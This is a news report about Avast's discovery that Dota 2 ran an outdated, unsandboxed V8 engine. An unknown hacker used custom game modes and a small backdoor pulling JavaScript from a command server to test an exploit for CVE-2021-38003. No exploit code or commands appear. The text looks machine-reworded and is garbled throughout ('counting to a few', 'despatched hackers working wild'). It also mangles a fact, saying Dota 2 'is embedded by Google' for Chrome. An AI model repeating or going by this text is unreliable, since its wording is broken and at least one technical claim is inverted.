In context: Released in 2013, Dota 2 stays probably the most widespread multiplayer experiences amongst MOBA followers. Over the course of 15 months, tens of millions of Dota 2 gamers may have been susceptible to distant code execution attributable to Valve’s carelessness.
Valve is infamous for taking time to make a brand new Half-Life sport (any new sport, actually) or counting to a few. The digital distribution large, co-founded by Gabe Newell, seems to be lax a couple of harmful safety breach that put gamers of certainly one of its hottest video games in danger and despatched hackers working wild with malicious experiments.
The free-to-play MOBA sport Dota 2 continues to be vastly widespread, regardless that it was initially launched almost 10 years in the past on July 9, 2013. Like many different video games, Dota 2 is embedded by Google for the Chromium/Chrome venture. The basic drawback right here is that, till lately, Valve was utilizing an outdated model of the V8 engine compiled in December 2018.
The greater than four-year-old model is riddled with probably harmful safety holes. To make issues worse Dota 2 would not run V8 with any sandbox safety. Criminals may exploit this situation to remotely run malicious code concentrating on Dota gamers. According to Avast, that is what occurred earlier than Valve lastly up to date the V8 engine.
Avast researchers found that an unknown hacker was testing a possible exploit for CVE-2021-38003, a particularly harmful safety flaw within the V8 engine with a severity score of 8.8/10. At first, hackers examined what seemed to be benign by releasing a brand new customized sport mode (a approach for gamers to change their Dota 2 expertise) that embedded exploit code for CVE-2021-38003.
The hackers have since launched three extra sport modes, taking a extra stealthy strategy, using a easy backdoor with solely “about twenty traces of code.” The backdoor can execute arbitrary JS scripts downloaded from the command and management server by way of HTTP. This neat trick permits attackers to cover the exploit code and replace it simply with out submitting new customized sport modes for evaluate and potential discovery. In different phrases, it permits hackers to dynamically execute JavaScript code within the background (probably the CVE-2021-38003 vulnerability).
Google patched CVE-2021-38003 in October 2021. Meanwhile, unknown hackers started experimenting in March 2022. Dota 2 builders did not trouble to repair the difficulty till January 2023, when Avast knowledgeable them of its findings. Further evaluation revealed that different exploits had been unsuccessful, and the true motivation of the Dota 2 hacker stays unknown.
